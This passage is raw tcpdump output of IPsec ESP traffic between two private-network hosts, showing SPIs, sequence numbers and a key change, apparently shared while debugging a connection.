> 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3b) (DF) (ttl 64, id 5482, len 1496) 20:04:11.910294 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3c) (DF) (ttl 64, id 5483, len 1496) 20:04:11.910442 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3d) (DF) (ttl 64, id 5484, len 1496) 20:04:11.910592 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3e) (DF) (ttl 64, id 5485, len 1496) 20:04:11.912595 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11320) (DF) (ttl 64, id 34207, len 72) 20:04:11.912746 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11321) (DF) (ttl 64, id 34208, len 72) 20:04:11.912782 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3f) (DF) (ttl 64, id 5486, len 1496) 20:04:11.912933 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa40) (DF) (ttl 64, id 5487, len 1496) 20:04:11.913106 192.168.0.1 > 192.168.0.3: 
ESP(spi=0x0c1e03ec,seq=0x3fa41) (DF) (ttl 64, id 5488, len 1496) 20:04:11.913257 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa42) (DF) (ttl 64, id 5489, len 1496) 20:04:11.913494 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11322) (DF) (ttl 64, id 34209, len 72) 20:04:11.913673 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa43) (DF) (ttl 64, id 5490, len 1496) 20:04:11.913820 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa44) (DF) (ttl 64, id 5491, len 1496) 20:04:11.913968 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa45) (DF) (ttl 64, id 5492, len 1496) 20:04:11.915429 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11323) (DF) (ttl 64, id 34210, len 72) 20:04:11.915535 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11324) (DF) (ttl 64, id 34211, len 72) 20:04:11.915623 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa46) (DF) (ttl 64, id 5493, len 1496) 20:04:11.915796 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa47) (DF) (ttl 64, id 5494, len 1496) 20:04:11.915948 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa48) (DF) (ttl 64, id 5495, len 1496) 20:04:11.916095 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa49) (DF) (ttl 64, id 5496, len 1496) 20:04:11.915719 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11325) (DF) (ttl 64, id 34212, len 72) 20:04:11.916301 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4a) (DF) (ttl 64, id 5497, len 1496) 20:04:11.916459 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4b) (DF) (ttl 64, id 5498, len 1496) 20:04:11.916616 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4c) (DF) (ttl 64, id 5499, len 1496) 20:04:11.916775 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4d) (DF) (ttl 64, id 5500, len 1496) 20:04:11.916933 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4e) (DF) (ttl 64, id 5501, len 1496) 20:04:11.917943 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11326) (DF) (ttl 64, id 34213, len 
72) 20:04:11.918118 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4f) (DF) (ttl 64, id 5502, len 1496) 20:04:11.918274 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa50) (DF) (ttl 64, id 5503, len 1496) 20:04:11.918423 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa51) (DF) (ttl 64, id 5504, len 1496) 20:04:11.918573 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa52) (DF) (ttl 64, id 5505, len 1496) 20:04:11.918723 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa53) (DF) (ttl 64, id 5506, len 1496) 20:04:11.918215 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11327) (DF) (ttl 64, id 34214, len 72) 20:04:11.919551 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11328) (DF) (ttl 64, id 34215, len 72) 20:04:11.919723 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa54) (DF) (ttl 64, id 5507, len 1496) 20:04:11.919740 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11329) (DF) (ttl 64, id 34216, len 72) 20:04:11.919872 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa55) (DF) (ttl 64, id 5508, len 1496) 20:04:11.920026 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa56) (DF) (ttl 64, id 5509, len 1496) 20:04:11.920169 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa57) (DF) (ttl 64, id 5510, len 1496) 20:04:11.920322 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa58) (DF) (ttl 64, id 5511, len 1496) 20:04:11.920469 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa59) (DF) (ttl 64, id 5512, len 1496) 20:04:11.920479 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132a) (DF) (ttl 64, id 34217, len 72) 20:04:11.920691 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5a) (DF) (ttl 64, id 5513, len 1496) 20:04:11.920839 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5b) (DF) (ttl 64, id 5514, len 1496) 20:04:11.920983 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5c) (DF) (ttl 64, id 5515, len 1496) 20:04:11.922911 192.168.0.3 > 192.168.0.1: 
ESP(spi=0x06e9543a,seq=0x1132b) (DF) (ttl 64, id 34218, len 72) 20:04:11.923041 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132c) (DF) (ttl 64, id 34219, len 72) 20:04:11.923193 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132d) (DF) (ttl 64, id 34220, len 72) 20:04:11.923369 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132e) (DF) (ttl 64, id 34221, len 72) 20:04:11.924299 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132f) (DF) (ttl 64, id 34222, len 72) 20:04:12.123058 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1) (DF) (ttl 64, id 5516, len 1496) 20:04:12.123682 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x1) (DF) (ttl 64, id 34223, len 88) 20:04:12.123895 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x2) (DF) (ttl 64, id 5517, len 1496) 20:04:12.124044 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x3) (DF) (ttl 64, id 5518, len 1496) 20:04:12.124190 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x4) (DF) (ttl 64, id 5519, len 1496) 20:04:12.124375 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x2) (DF) (ttl 64, id 34224, len 72) 20:04:12.124607 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x5) (DF) (ttl 64, id 5520, len 1496) 20:04:12.124636 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x3) (DF) (ttl 64, id 34225, len 72) 20:04:12.124755 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x6) (DF) (ttl 64, id 5521, len 1496) 20:04:12.124897 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x4) (DF) (ttl 64, id 34226, len 72) 20:04:12.124929 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x7) (DF) (ttl 64, id 5522, len 1496) 20:04:12.125079 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x8) (DF) (ttl 64, id 5523, len 1496) 20:04:12.125190 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x5) (DF) (ttl 64, id 34227, len 72) 20:04:12.125250 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x9) (DF) (ttl 64, id 5524, len 1496) 20:04:12.125403 192.168.0.1 > 192.168.0.3: 
ESP(spi=0x0c59bc9d,seq=0xa) (DF) (ttl 64, id 5525, len 1496) 20:04:12.125478 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x6) (DF) (ttl 64, id 34228, len 72) 20:04:12.125584 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xb) (DF) (ttl 64, id 5526, len 1496) 20:04:12.125737 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xc) (DF) (ttl 64, id 5527, len 1496) 20:04:12.125913 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xd) (DF) (ttl 64, id 5528, len 1496) 20:04:12.126062 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xe) (DF) (ttl 64, id 5529, len 1496) 20:04:12.125744 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x7) (DF) (ttl 64, id 34229, len 72) 20:04:12.126032 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x8) (DF) (ttl 64, id 34230, len 72) 20:04:12.126274 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xf) (DF) (ttl 64, id 5530, len 1496) 20:04:12.126329 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x9) (DF) (ttl 64, id 34231, len 72) 20:04:12.126423 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x10) (DF) (ttl 64, id 5531, len 1496) 20:04:12.126584 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x11) (DF) (ttl 64, id 5532, len 1496) 20:04:12.126586 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xa) (DF) (ttl 64, id 34232, len 72) 20:04:12.126740 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x12) (DF) (ttl 64, id 5533, len 1496) 20:04:12.126869 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xb) (DF) (ttl 64, id 34233, len 72) 20:04:12.126909 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x13) (DF) (ttl 64, id 5534, len 1496) 20:04:12.127066 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x14) (DF) (ttl 64, id 5535, len 1496) 20:04:12.127227 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x15) (DF) (ttl 64, id 5536, len 1496) 20:04:12.127228 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xc) (DF) (ttl 64, id 34234, len 72) 20:04:12.127388 192.168.0.1 > 192.168.0.3: 
ESP(spi=0x0c59bc9d,seq=0x16) (DF) (ttl 64, id 5537, len 1496) 20:04:12.127539 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xd) (DF) (ttl 64, id 34235, len 72) 20:04:12.127548 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x17) (DF) (ttl 64, id 5538, len 1496) 20:04:12.127700 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x18) (DF) (ttl 64, id 5539, len 1496) 20:04:12.127848 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xe) (DF) (ttl 64, id 34236, len 72) 20:04:12.127862 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x19) (DF) (ttl 64, id 5540, len 1496) 20:04:12.128010 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1a) (DF) (ttl 64, id 5541, len 1496) 20:04:12.128155 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xf) (DF) (ttl 64, id 34237, len 72) 20:04:12.128175 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1b) (DF) (ttl 64, id 5542, len 1496) 20:04:12.128329 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1c) (DF) (ttl 64, id 5543, len 1496) 20:04:12.128495 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1d) (DF) (ttl 64, id 5544, len 1496) 20:04:12.128549 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x10) (DF) (ttl 64, id 34238, len 72) 20:04:12.128644 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1e) (DF) (ttl 64, id 5545, len 1496) 20:04:12.128806 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1f) (DF) (ttl 64, id 5546, len 1496) 20:04:12.128954 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x20) (DF) (ttl 64, id 5547, len 1496) 20:04:12.129108 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x21) (DF) (ttl 64, id 5548, len 1496) 20:04:12.133258 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x11) (DF) (ttl 64, id 34239, len 72) 20:04:12.133508 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x12) (DF) (ttl 64, id 34240, len 72) 20:04:29.971609 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x13) (DF) (ttl 64, id 34241, len 72) 20:04:30.179171 192.168.0.3 > 192.168.0.1: 
ESP(spi=0x039c0c62,seq=0x14) (DF) (ttl 64, id 34242, len 72) 20:04:30.595134 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x15) (DF) (ttl 64, id 34243, len 72) --- last 150 lines of tcpdump on 192.168.0.3 19:55:25.903800 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa15) (DF) (ttl 64, id 5444, len 1496) 19:55:25.903944 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa16) (DF) (ttl 64, id 5445, len 1496) 19:55:25.904102 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa17) (DF) (ttl 64, id 5446, len 1496) 19:55:25.905078 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11315) (DF) (ttl 64, id 34196, len 72) 19:55:25.905196 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11316) (DF) (ttl 64, id 34197, len 72) 19:55:25.905321 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11317) (DF) (ttl 64, id 34198, len 72) 19:55:25.905463 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa18) (DF) (ttl 64, id 5447, len 1496) 19:55:25.905646 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa19) (DF) (ttl 64, id 5448, len 1496) 19:55:25.905798 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1a) (DF) (ttl 64, id 5449, len 1496) 19:55:25.905948 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1b) (DF) (ttl 64, id 5450, len 1496) 19:55:25.906126 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1c) (DF) (ttl 64, id 5451, len 1496) 19:55:25.906276 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1d) (DF) (ttl 64, id 5452, len 1496) 19:55:25.906425 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1e) (DF) (ttl 64, id 5453, len 1496) 19:55:25.906575 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1f) (DF) (ttl 64, id 5454, len 1496) 19:55:25.907210 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11318) (DF) (ttl 64, id 34199, len 72) 19:55:25.907445 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11319) (DF) (ttl 64, id 34200, len 72) 19:55:25.907589 192.168.0.1 > 192.168.0.3: 
ESP(spi=0x0c1e03ec,seq=0x3fa20) (DF) (ttl 64, id 5455, len 1496) 19:55:25.907739 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa21) (DF) (ttl 64, id 5456, len 1496) 19:55:25.907902 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa22) (DF) (ttl 64, id 5457, len 1496) 19:55:25.908050 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa23) (DF) (ttl 64, id 5458, len 1496) 19:55:25.908201 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa24) (DF) (ttl 64, id 5459, len 1496) 19:55:25.908350 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa25) (DF) (ttl 64, id 5460, len 1496) 19:55:25.908497 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa26) (DF) (ttl 64, id 5461, len 1496) 19:55:25.908646 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa27) (DF) (ttl 64, id 5462, len 1496) 19:55:25.908831 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa28) (DF) (ttl 64, id 5463, len 1496) 19:55:25.909557 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131a) (DF) (ttl 64, id 34201, len 72) 19:55:25.909806 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131b) (DF) (ttl 64, id 34202, len 72) 19:55:25.909942 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa29) (DF) (ttl 64, id 5464, len 1496) 19:55:25.910106 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2a) (DF) (ttl 64, id 5465, len 1496) 19:55:25.910249 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2b) (DF) (ttl 64, id 5466, len 1496) 19:55:25.910389 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2c) (DF) (ttl 64, id 5467, len 1496) 19:55:25.910529 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2d) (DF) (ttl 64, id 5468, len 1496) 19:55:25.910668 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2e) (DF) (ttl 64, id 5469, len 1496) 19:55:25.912017 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131c) (DF) (ttl 64, id 34203, len 72) 19:55:25.912132 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131d) (DF) (ttl 64, id 34204, 
len 72) 19:55:25.912259 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131e) (DF) (ttl 64, id 34205, len 72) 19:55:25.912415 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131f) (DF) (ttl 64, id 34206, len 72) 19:55:25.912474 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2f) (DF) (ttl 64, id 5470, len 1496) 19:55:25.912651 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa30) (DF) (ttl 64, id 5471, len 1496) 19:55:25.912806 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa31) (DF) (ttl 64, id 5472, len 1496) 19:55:25.912949 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa32) (DF) (ttl 64, id 5473, len 1496) 19:55:25.913124 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa33) (DF) (ttl 64, id 5474, len 1496) 19:55:25.913290 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa34) (DF) (ttl 64, id 5475, len 1496) 19:55:25.913442 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa35) (DF) (ttl 64, id 5476, len 1496) 19:55:25.913594 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa36) (DF) (ttl 64, id 5477, len 1496) 19:55:25.913807 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa37) (DF) (ttl 64, id 5478, len 1496) 19:55:25.913954 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa38) (DF) (ttl 64, id 5479, len 1496) 19:55:25.914117 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa39) (DF) (ttl 64, id 5480, len 1496) 19:55:25.914260 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3a) (DF) (ttl 64, id 5481, len 1496) 19:55:25.914406 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3b) (DF) (ttl 64, id 5482, len 1496) 19:55:25.914558 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3c) (DF) (ttl 64, id 5483, len 1496) 19:55:25.914711 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3d) (DF) (ttl 64, id 5484, len 1496) 19:55:25.914860 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3e) (DF) (ttl 64, id 5485, len 1496) 19:55:25.916653 192.168.0.3 > 192.168.0.1: 
ESP(spi=0x06e9543a,seq=0x11320) (DF) (ttl 64, id 34207, len 72) 19:55:25.916807 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11321) (DF) (ttl 64, id 34208, len 72) 19:55:25.917046 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3f) (DF) (ttl 64, id 5486, len 1496) 19:55:25.917196 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa40) (DF) (ttl 64, id 5487, len 1496) 19:55:25.917561 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11322) (DF) (ttl 64, id 34209, len 72) 19:55:25.917371 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa41) (DF) (ttl 64, id 5488, len 1496) 19:55:25.917517 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa42) (DF) (ttl 64, id 5489, len 1496) 19:55:25.917936 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa43) (DF) (ttl 64, id 5490, len 1496) 19:55:25.918095 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa44) (DF) (ttl 64, id 5491, len 1496) 19:55:25.918230 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa45) (DF) (ttl 64, id 5492, len 1496) 19:55:25.919488 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11323) (DF) (ttl 64, id 34210, len 72) 19:55:25.919595 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11324) (DF) (ttl 64, id 34211, len 72) 19:55:25.919778 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11325) (DF) (ttl 64, id 34212, len 72) 19:55:25.919887 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa46) (DF) (ttl 64, id 5493, len 1496) 19:55:25.920059 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa47) (DF) (ttl 64, id 5494, len 1496) 19:55:25.920206 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa48) (DF) (ttl 64, id 5495, len 1496) 19:55:25.920353 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa49) (DF) (ttl 64, id 5496, len 1496) 19:55:25.920576 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4a) (DF) (ttl 64, id 5497, len 1496) 19:55:25.920725 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4b) (DF) (ttl 64, id 5498, len 
1496) 19:55:25.920880 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4c) (DF) (ttl 64, id 5499, len 1496) 19:55:25.921037 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4d) (DF) (ttl 64, id 5500, len 1496) 19:55:25.921195 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4e) (DF) (ttl 64, id 5501, len 1496) 19:55:25.922003 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11326) (DF) (ttl 64, id 34213, len 72) 19:55:25.922276 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11327) (DF) (ttl 64, id 34214, len 72) 19:55:25.922380 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4f) (DF) (ttl 64, id 5502, len 1496) 19:55:25.922536 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa50) (DF) (ttl 64, id 5503, len 1496) 19:55:25.922724 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa51) (DF) (ttl 64, id 5504, len 1496) 19:55:25.922837 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa52) (DF) (ttl 64, id 5505, len 1496) 19:55:25.922989 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa53) (DF) (ttl 64, id 5506, len 1496) 19:55:25.923612 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11328) (DF) (ttl 64, id 34215, len 72) 19:55:25.923798 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11329) (DF) (ttl 64, id 34216, len 72) 19:55:25.923989 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa54) (DF) (ttl 64, id 5507, len 1496) 19:55:25.924131 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa55) (DF) (ttl 64, id 5508, len 1496) 19:55:25.924539 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132a) (DF) (ttl 64, id 34217, len 72) 19:55:25.924287 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa56) (DF) (ttl 64, id 5509, len 1496) 19:55:25.924431 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa57) (DF) (ttl 64, id 5510, len 1496) 19:55:25.924574 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa58) (DF) (ttl 64, id 5511, len 1496) 19:55:25.924732 192.168.0.1 > 192.168.0.3: 
ESP(spi=0x0c1e03ec,seq=0x3fa59) (DF) (ttl 64, id 5512, len 1496) 19:55:25.924953 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5a) (DF) (ttl 64, id 5513, len 1496) 19:55:25.925107 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5b) (DF) (ttl 64, id 5514, len 1496) 19:55:25.925243 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5c) (DF) (ttl 64, id 5515, len 1496) 19:55:25.926969 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132b) (DF) (ttl 64, id 34218, len 72) 19:55:25.927101 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132c) (DF) (ttl 64, id 34219, len 72) 19:55:25.927255 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132d) (DF) (ttl 64, id 34220, len 72) 19:55:25.927431 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132e) (DF) (ttl 64, id 